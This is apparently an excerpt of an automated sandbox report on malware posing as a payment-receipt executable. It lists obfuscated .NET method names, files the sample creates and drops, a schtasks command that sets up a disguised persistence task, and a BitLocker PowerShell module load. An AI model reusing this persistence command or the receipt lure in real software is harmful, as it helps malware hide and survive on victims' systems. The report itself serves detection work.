Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, aQalOPXRdg1IB4XNbZc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Iu7F7h8owG', 'AqxFcoqb7K', 'bn5FpTS6JM', 'LekFF5EN49', 'gkdFZObUmB', 'kMWFygKspg', 'tIgF3PlsWg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, t1lwPJXMhK5wLTeZywK.cs	High entropy of concatenated method names: 'ToString', 'Ihcp4A2XkY', 'xVvpAUdtDl', 'imHpRy1l2y', 'NjIp6ThNa4', 'PHUp8uZCYq', 'jgdp5Dc3rD', 'Pw3p9RqOgq', 'B17Tv3pEivGh9XSb0IR', 'GH6IPhph7uhmdgXLMYW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	High entropy of concatenated method names: 'VutWl0vX2f', 'k0mWrmTxy0', 'sETWIyJ7xS', 'lE0WJWRnkk', 'Q38WeJe2Mk', 'bGmWBYMMbH', 'kGKWQSpkmb', 'B5LWsbMhpO', 'WHFWv6BAYY', 'bPVWUwgNl9'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UsKqHEY15lfJlSp9ms.cs	High entropy of concatenated method names: 'tjbcMRPZaX', 'WsrcdiTBsg', 'FcycVj8HPh', 'q6ncgtpMh6', 'c7Cc7NSCG6', 'iAWcLN9p5l', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, TcgAcYJXX98rk31LU1.cs	High entropy of concatenated method names: 'qPiMDixgyh', 'eMyMhFZeZQ', 'QnlM414TSR', 'TADMAQPhgE', 'BHuMbw6rOe', 'SfMMCojEL5', 'zCSM0ZNLWX', 'zZLM2sRwNw', 'QZRM7u4Kqn', 'kkmMcBEj8c'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, vlp0HaEyxMx7GNYsTy.cs	High entropy of concatenated method names: 'ToString', 'qdKCo7gwKI', 'qLHC8bMCrS', 'OUwC5Y7vtm', 'UQcC9NZByu', 'zRfCE4HPd4', 'vqTC1XAu7u', 'w68CNnO8hN', 'h5FCYSmGyT', 'XoGCiQwX8i'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, vgQsrg42Vng1ubWDlX.cs	High entropy of concatenated method names: 'Dispose', 'A1QSviRbnD', 'mTbH8qdBhd', 'X0hFeqxTnE', 'G1bSURbyqr', 'EU2SzTKcJU', 'ProcessDialogKey', 'oeoHT5HurY', 'JTTHSpPN9I', 'RdJHHyujLN'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UN2Il68uhcF7U4lhr2.cs	High entropy of concatenated method names: 'LvQawYErmP', 'tMcaPgOjuL', 'YVAaWSRlbQ', 'KhRaMmyGRc', 'D16adH3pVk', 'CJ5aV8n1Jc', 'uYGagwpFoM', 'oHkaLHXE2p', 'SL3aGvEb8D', 'amhaXepGir'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, w4CmknznayWT4gH1RD.cs	High entropy of concatenated method names: 'EA5chrh57i', 'wV8c48hCIA', 'pwjcAo4kZG', 'aUXc6vV4IF', 'IMec8Z9gIt', 'L1Gc9Kyhnx', 'HPYcEt335l', 'Jikc3ecWrf', 'USLcKGBqSf', 'dujcfXmE0m'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, QK4Opdhe02qvnIQvmG.cs	High entropy of concatenated method names: 'LQk0sIQ52D', 'SgH0USusoF', 'tkd2TeFElt', 'fUp2SKO9AR', 'D8L0ok1Ddt', 'hKq0j41t27', 'eek0OwQZC7', 'wvk0lQ3aMm', 'WY20rrjn7P', 'FlB0IWVdtW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, tAXMnmZqyVpMi8OTn8.cs	High entropy of concatenated method names: 'tRRq4NQObC', 'Ut3qAaqPcq', 'uoTq6eb39r', 'muFq8e6otc', 'jiNq9mrCR2', 'XnlqEHCYK3', 'AnBqN74FJt', 'ns2qYPcqAq', 'Adgqx1dfYX', 'mqfqotpfkl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, L8PSOcNTvZ3DlJpBHx.cs	High entropy of concatenated method names: 'vWg0XJ86xk', 'hEm0k1I9jJ', 'ToString', 'ieC0Pgn4kG', 'iiN0WNB9Xf', 'd560MsWS77', 'KOu0derEVf', 'Imy0VC36Rs', 'ky90giAR6N', 'vDS0LpfQT5'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, U2UEi2XXBHLAFdEIIk8.cs	High entropy of concatenated method names: 'SnpcUKlyJQ', 'Dooczds8Ky', 'h35pTyhd1q', 'eZdpSoIVne', 'WaopHxtgPy', 'Ghtpavges3', 'c8vpmU5nYh', 'fonpw08BMy', 'JGOpPHMMMM', 'thlpWa2rwt'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, genOFhX2TLRgnBXEp7E.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SdtconEEcQ', 'JAEcjgvVEF', 'nSDcO6qTkY', 'zXiclhsp5R', 'x6ycr0MfUv', 'VjVcI0e2sY', 'mp8cJBQR4n'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, F2dtxkbFnkETGpKy64.cs	High entropy of concatenated method names: 'UI176n08Wi', 'RIf78MDNOc', 'PYh75k9Dtl', 'oWl79VrU86', 'aLr7EM6yBZ', 'LvK71ulHNV', 'K487NrtUyK', 'pcX7YT6PIM', 'KvE7i5qhPK', 'gVo7xwvpAc'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, Xg0aYjFPjhkTXetPWR.cs	High entropy of concatenated method names: 'jlMVICAhNv', 'I74VJgZrP9', 'iMEVeYueCL', 'ToString', 'EOOVBv8waJ', 'JyFVQ4ZFbj', 'Mu1sUT9qB2hjBVXxs68', 'Ks3HRP9rNP2IQwuLbAu', 'lTeigR9OeWbFYHCQfNj'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, EJ7KSwMbo7dWXB4LiG.cs	High entropy of concatenated method names: 'moqnJr3QJ', 'TywDgGoX7', 'C4FheT9LE', 'R5muTTiVk', 'pFsAdoH8D', 'fdFRLQscv', 'bTobfpH5LCHq6QHr8c', 'JlCiMB19rYJOl3r7FT', 'sm62icliZ', 'NXncuUBFl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, RkIIJARuWkoGdBjUuN.cs	High entropy of concatenated method names: 'GDQSgbxaBc', 'UTySLJqhHG', 'hl3SXsaBjm', 'lMCSkMaksg', 'lqtSbtA5RG', 'FCeSCYyLlX', 'YxqkBsAY5yE03nHqTb', 'Y0HPjTEKDmOdn0IKJB', 'POKSSUHwxs', 'eNSSaHHXnt'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, xtZk0BqDFfSIoTf13a.cs	High entropy of concatenated method names: 'ftugKS4jac', 'qLSgfqcQ1Y', 'UHcgnCPXHa', 'IrDgDowSkP', 'ymIgt3raNm', 'A3AghGFkpm', 'zL3guoMS77', 'aZMg4s5P9N', 'lUcgAtB7ZZ', 'X1cgRyLIPZ'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, rd6seU0CBflQIvUF68.cs	High entropy of concatenated method names: 'a2BbxoIZPL', 'CXPbj0sIYW', 'cQLbldj7wP', 'ks1brT7Q4y', 'vBOb8EKQo3', 'IHqb5NmfME', 'YIyb9s5oU4', 'lkybE8eAyw', 'rFgb1Cj0p5', 's0fbNmlZvg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, SstYqctIswIM3VfhHi.cs	High entropy of concatenated method names: 'Y2EVw3dD7J', 'lvvVWqNSYa', 'fQWVdXpSDT', 'qqYVgiv3GD', 'hhTVLfyUIu', 'X5ede91P3H', 'EY2dBDxGPR', 'CbddQrkiOC', 'y7AdsAQRMM', 'VcSdv5lnEB'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, a7YovMK8v3yfJuJ3TX.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IblHvQiuOc', 'Xb1HU4lYjR', 'TXuHz4dM3n', 'XDJaTxPKR7', 'qS4aSGCWZc', 'AIBaHVniZR', 'Dfeaav7Oh0', 'jdLFjHlpyDugR14nE7u'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, bLP4McBA6wcmJVrIo0.cs	High entropy of concatenated method names: 'Bkp7bIGjM7', 'Y4Q70Y8wBD', 'uf177AKAWJ', 'HCX7pIcGiQ', 'Nhk7Z98GcK', 'XO973e3wTB', 'Dispose', 'Vd52PKSWQv', 'Jcf2WVBJif', 'dge2McsO33'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, aQalOPXRdg1IB4XNbZc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Iu7F7h8owG', 'AqxFcoqb7K', 'bn5FpTS6JM', 'LekFF5EN49', 'gkdFZObUmB', 'kMWFygKspg', 'tIgF3PlsWg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, t1lwPJXMhK5wLTeZywK.cs	High entropy of concatenated method names: 'ToString', 'Ihcp4A2XkY', 'xVvpAUdtDl', 'imHpRy1l2y', 'NjIp6ThNa4', 'PHUp8uZCYq', 'jgdp5Dc3rD', 'Pw3p9RqOgq', 'B17Tv3pEivGh9XSb0IR', 'GH6IPhph7uhmdgXLMYW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	High entropy of concatenated method names: 'VutWl0vX2f', 'k0mWrmTxy0', 'sETWIyJ7xS', 'lE0WJWRnkk', 'Q38WeJe2Mk', 'bGmWBYMMbH', 'kGKWQSpkmb', 'B5LWsbMhpO', 'WHFWv6BAYY', 'bPVWUwgNl9'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UsKqHEY15lfJlSp9ms.cs	High entropy of concatenated method names: 'tjbcMRPZaX', 'WsrcdiTBsg', 'FcycVj8HPh', 'q6ncgtpMh6', 'c7Cc7NSCG6', 'iAWcLN9p5l', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, TcgAcYJXX98rk31LU1.cs	High entropy of concatenated method names: 'qPiMDixgyh', 'eMyMhFZeZQ', 'QnlM414TSR', 'TADMAQPhgE', 'BHuMbw6rOe', 'SfMMCojEL5', 'zCSM0ZNLWX', 'zZLM2sRwNw', 'QZRM7u4Kqn', 'kkmMcBEj8c'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, vlp0HaEyxMx7GNYsTy.cs	High entropy of concatenated method names: 'ToString', 'qdKCo7gwKI', 'qLHC8bMCrS', 'OUwC5Y7vtm', 'UQcC9NZByu', 'zRfCE4HPd4', 'vqTC1XAu7u', 'w68CNnO8hN', 'h5FCYSmGyT', 'XoGCiQwX8i'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, vgQsrg42Vng1ubWDlX.cs	High entropy of concatenated method names: 'Dispose', 'A1QSviRbnD', 'mTbH8qdBhd', 'X0hFeqxTnE', 'G1bSURbyqr', 'EU2SzTKcJU', 'ProcessDialogKey', 'oeoHT5HurY', 'JTTHSpPN9I', 'RdJHHyujLN'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UN2Il68uhcF7U4lhr2.cs	High entropy of concatenated method names: 'LvQawYErmP', 'tMcaPgOjuL', 'YVAaWSRlbQ', 'KhRaMmyGRc', 'D16adH3pVk', 'CJ5aV8n1Jc', 'uYGagwpFoM', 'oHkaLHXE2p', 'SL3aGvEb8D', 'amhaXepGir'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, w4CmknznayWT4gH1RD.cs	High entropy of concatenated method names: 'EA5chrh57i', 'wV8c48hCIA', 'pwjcAo4kZG', 'aUXc6vV4IF', 'IMec8Z9gIt', 'L1Gc9Kyhnx', 'HPYcEt335l', 'Jikc3ecWrf', 'USLcKGBqSf', 'dujcfXmE0m'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, QK4Opdhe02qvnIQvmG.cs	High entropy of concatenated method names: 'LQk0sIQ52D', 'SgH0USusoF', 'tkd2TeFElt', 'fUp2SKO9AR', 'D8L0ok1Ddt', 'hKq0j41t27', 'eek0OwQZC7', 'wvk0lQ3aMm', 'WY20rrjn7P', 'FlB0IWVdtW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, tAXMnmZqyVpMi8OTn8.cs	High entropy of concatenated method names: 'tRRq4NQObC', 'Ut3qAaqPcq', 'uoTq6eb39r', 'muFq8e6otc', 'jiNq9mrCR2', 'XnlqEHCYK3', 'AnBqN74FJt', 'ns2qYPcqAq', 'Adgqx1dfYX', 'mqfqotpfkl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, L8PSOcNTvZ3DlJpBHx.cs	High entropy of concatenated method names: 'vWg0XJ86xk', 'hEm0k1I9jJ', 'ToString', 'ieC0Pgn4kG', 'iiN0WNB9Xf', 'd560MsWS77', 'KOu0derEVf', 'Imy0VC36Rs', 'ky90giAR6N', 'vDS0LpfQT5'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, U2UEi2XXBHLAFdEIIk8.cs	High entropy of concatenated method names: 'SnpcUKlyJQ', 'Dooczds8Ky', 'h35pTyhd1q', 'eZdpSoIVne', 'WaopHxtgPy', 'Ghtpavges3', 'c8vpmU5nYh', 'fonpw08BMy', 'JGOpPHMMMM', 'thlpWa2rwt'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, genOFhX2TLRgnBXEp7E.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SdtconEEcQ', 'JAEcjgvVEF', 'nSDcO6qTkY', 'zXiclhsp5R', 'x6ycr0MfUv', 'VjVcI0e2sY', 'mp8cJBQR4n'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, F2dtxkbFnkETGpKy64.cs	High entropy of concatenated method names: 'UI176n08Wi', 'RIf78MDNOc', 'PYh75k9Dtl', 'oWl79VrU86', 'aLr7EM6yBZ', 'LvK71ulHNV', 'K487NrtUyK', 'pcX7YT6PIM', 'KvE7i5qhPK', 'gVo7xwvpAc'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, Xg0aYjFPjhkTXetPWR.cs	High entropy of concatenated method names: 'jlMVICAhNv', 'I74VJgZrP9', 'iMEVeYueCL', 'ToString', 'EOOVBv8waJ', 'JyFVQ4ZFbj', 'Mu1sUT9qB2hjBVXxs68', 'Ks3HRP9rNP2IQwuLbAu', 'lTeigR9OeWbFYHCQfNj'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, EJ7KSwMbo7dWXB4LiG.cs	High entropy of concatenated method names: 'moqnJr3QJ', 'TywDgGoX7', 'C4FheT9LE', 'R5muTTiVk', 'pFsAdoH8D', 'fdFRLQscv', 'bTobfpH5LCHq6QHr8c', 'JlCiMB19rYJOl3r7FT', 'sm62icliZ', 'NXncuUBFl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, RkIIJARuWkoGdBjUuN.cs	High entropy of concatenated method names: 'GDQSgbxaBc', 'UTySLJqhHG', 'hl3SXsaBjm', 'lMCSkMaksg', 'lqtSbtA5RG', 'FCeSCYyLlX', 'YxqkBsAY5yE03nHqTb', 'Y0HPjTEKDmOdn0IKJB', 'POKSSUHwxs', 'eNSSaHHXnt'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, xtZk0BqDFfSIoTf13a.cs	High entropy of concatenated method names: 'ftugKS4jac', 'qLSgfqcQ1Y', 'UHcgnCPXHa', 'IrDgDowSkP', 'ymIgt3raNm', 'A3AghGFkpm', 'zL3guoMS77', 'aZMg4s5P9N', 'lUcgAtB7ZZ', 'X1cgRyLIPZ'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, rd6seU0CBflQIvUF68.cs	High entropy of concatenated method names: 'a2BbxoIZPL', 'CXPbj0sIYW', 'cQLbldj7wP', 'ks1brT7Q4y', 'vBOb8EKQo3', 'IHqb5NmfME', 'YIyb9s5oU4', 'lkybE8eAyw', 'rFgb1Cj0p5', 's0fbNmlZvg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, SstYqctIswIM3VfhHi.cs	High entropy of concatenated method names: 'Y2EVw3dD7J', 'lvvVWqNSYa', 'fQWVdXpSDT', 'qqYVgiv3GD', 'hhTVLfyUIu', 'X5ede91P3H', 'EY2dBDxGPR', 'CbddQrkiOC', 'y7AdsAQRMM', 'VcSdv5lnEB'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, a7YovMK8v3yfJuJ3TX.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IblHvQiuOc', 'Xb1HU4lYjR', 'TXuHz4dM3n', 'XDJaTxPKR7', 'qS4aSGCWZc', 'AIBaHVniZR', 'Dfeaav7Oh0', 'jdLFjHlpyDugR14nE7u'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, bLP4McBA6wcmJVrIo0.cs	High entropy of concatenated method names: 'Bkp7bIGjM7', 'Y4Q70Y8wBD', 'uf177AKAWJ', 'HCX7pIcGiQ', 'Nhk7Z98GcK', 'XO973e3wTB', 'Dispose', 'Vd52PKSWQv', 'Jcf2WVBJif', 'dge2McsO33'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, aQalOPXRdg1IB4XNbZc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Iu7F7h8owG', 'AqxFcoqb7K', 'bn5FpTS6JM', 'LekFF5EN49', 'gkdFZObUmB', 'kMWFygKspg', 'tIgF3PlsWg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, t1lwPJXMhK5wLTeZywK.cs	High entropy of concatenated method names: 'ToString', 'Ihcp4A2XkY', 'xVvpAUdtDl', 'imHpRy1l2y', 'NjIp6ThNa4', 'PHUp8uZCYq', 'jgdp5Dc3rD', 'Pw3p9RqOgq', 'B17Tv3pEivGh9XSb0IR', 'GH6IPhph7uhmdgXLMYW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	High entropy of concatenated method names: 'VutWl0vX2f', 'k0mWrmTxy0', 'sETWIyJ7xS', 'lE0WJWRnkk', 'Q38WeJe2Mk', 'bGmWBYMMbH', 'kGKWQSpkmb', 'B5LWsbMhpO', 'WHFWv6BAYY', 'bPVWUwgNl9'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UsKqHEY15lfJlSp9ms.cs	High entropy of concatenated method names: 'tjbcMRPZaX', 'WsrcdiTBsg', 'FcycVj8HPh', 'q6ncgtpMh6', 'c7Cc7NSCG6', 'iAWcLN9p5l', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, TcgAcYJXX98rk31LU1.cs	High entropy of concatenated method names: 'qPiMDixgyh', 'eMyMhFZeZQ', 'QnlM414TSR', 'TADMAQPhgE', 'BHuMbw6rOe', 'SfMMCojEL5', 'zCSM0ZNLWX', 'zZLM2sRwNw', 'QZRM7u4Kqn', 'kkmMcBEj8c'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, vlp0HaEyxMx7GNYsTy.cs	High entropy of concatenated method names: 'ToString', 'qdKCo7gwKI', 'qLHC8bMCrS', 'OUwC5Y7vtm', 'UQcC9NZByu', 'zRfCE4HPd4', 'vqTC1XAu7u', 'w68CNnO8hN', 'h5FCYSmGyT', 'XoGCiQwX8i'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, vgQsrg42Vng1ubWDlX.cs	High entropy of concatenated method names: 'Dispose', 'A1QSviRbnD', 'mTbH8qdBhd', 'X0hFeqxTnE', 'G1bSURbyqr', 'EU2SzTKcJU', 'ProcessDialogKey', 'oeoHT5HurY', 'JTTHSpPN9I', 'RdJHHyujLN'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UN2Il68uhcF7U4lhr2.cs	High entropy of concatenated method names: 'LvQawYErmP', 'tMcaPgOjuL', 'YVAaWSRlbQ', 'KhRaMmyGRc', 'D16adH3pVk', 'CJ5aV8n1Jc', 'uYGagwpFoM', 'oHkaLHXE2p', 'SL3aGvEb8D', 'amhaXepGir'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, w4CmknznayWT4gH1RD.cs	High entropy of concatenated method names: 'EA5chrh57i', 'wV8c48hCIA', 'pwjcAo4kZG', 'aUXc6vV4IF', 'IMec8Z9gIt', 'L1Gc9Kyhnx', 'HPYcEt335l', 'Jikc3ecWrf', 'USLcKGBqSf', 'dujcfXmE0m'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, QK4Opdhe02qvnIQvmG.cs	High entropy of concatenated method names: 'LQk0sIQ52D', 'SgH0USusoF', 'tkd2TeFElt', 'fUp2SKO9AR', 'D8L0ok1Ddt', 'hKq0j41t27', 'eek0OwQZC7', 'wvk0lQ3aMm', 'WY20rrjn7P', 'FlB0IWVdtW'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, tAXMnmZqyVpMi8OTn8.cs	High entropy of concatenated method names: 'tRRq4NQObC', 'Ut3qAaqPcq', 'uoTq6eb39r', 'muFq8e6otc', 'jiNq9mrCR2', 'XnlqEHCYK3', 'AnBqN74FJt', 'ns2qYPcqAq', 'Adgqx1dfYX', 'mqfqotpfkl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, L8PSOcNTvZ3DlJpBHx.cs	High entropy of concatenated method names: 'vWg0XJ86xk', 'hEm0k1I9jJ', 'ToString', 'ieC0Pgn4kG', 'iiN0WNB9Xf', 'd560MsWS77', 'KOu0derEVf', 'Imy0VC36Rs', 'ky90giAR6N', 'vDS0LpfQT5'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, U2UEi2XXBHLAFdEIIk8.cs	High entropy of concatenated method names: 'SnpcUKlyJQ', 'Dooczds8Ky', 'h35pTyhd1q', 'eZdpSoIVne', 'WaopHxtgPy', 'Ghtpavges3', 'c8vpmU5nYh', 'fonpw08BMy', 'JGOpPHMMMM', 'thlpWa2rwt'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, genOFhX2TLRgnBXEp7E.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SdtconEEcQ', 'JAEcjgvVEF', 'nSDcO6qTkY', 'zXiclhsp5R', 'x6ycr0MfUv', 'VjVcI0e2sY', 'mp8cJBQR4n'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, F2dtxkbFnkETGpKy64.cs	High entropy of concatenated method names: 'UI176n08Wi', 'RIf78MDNOc', 'PYh75k9Dtl', 'oWl79VrU86', 'aLr7EM6yBZ', 'LvK71ulHNV', 'K487NrtUyK', 'pcX7YT6PIM', 'KvE7i5qhPK', 'gVo7xwvpAc'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, Xg0aYjFPjhkTXetPWR.cs	High entropy of concatenated method names: 'jlMVICAhNv', 'I74VJgZrP9', 'iMEVeYueCL', 'ToString', 'EOOVBv8waJ', 'JyFVQ4ZFbj', 'Mu1sUT9qB2hjBVXxs68', 'Ks3HRP9rNP2IQwuLbAu', 'lTeigR9OeWbFYHCQfNj'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, EJ7KSwMbo7dWXB4LiG.cs	High entropy of concatenated method names: 'moqnJr3QJ', 'TywDgGoX7', 'C4FheT9LE', 'R5muTTiVk', 'pFsAdoH8D', 'fdFRLQscv', 'bTobfpH5LCHq6QHr8c', 'JlCiMB19rYJOl3r7FT', 'sm62icliZ', 'NXncuUBFl'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, RkIIJARuWkoGdBjUuN.cs	High entropy of concatenated method names: 'GDQSgbxaBc', 'UTySLJqhHG', 'hl3SXsaBjm', 'lMCSkMaksg', 'lqtSbtA5RG', 'FCeSCYyLlX', 'YxqkBsAY5yE03nHqTb', 'Y0HPjTEKDmOdn0IKJB', 'POKSSUHwxs', 'eNSSaHHXnt'

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File created: \payment receipt po 1437 1_ payment receipt po #1437 2.exe	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
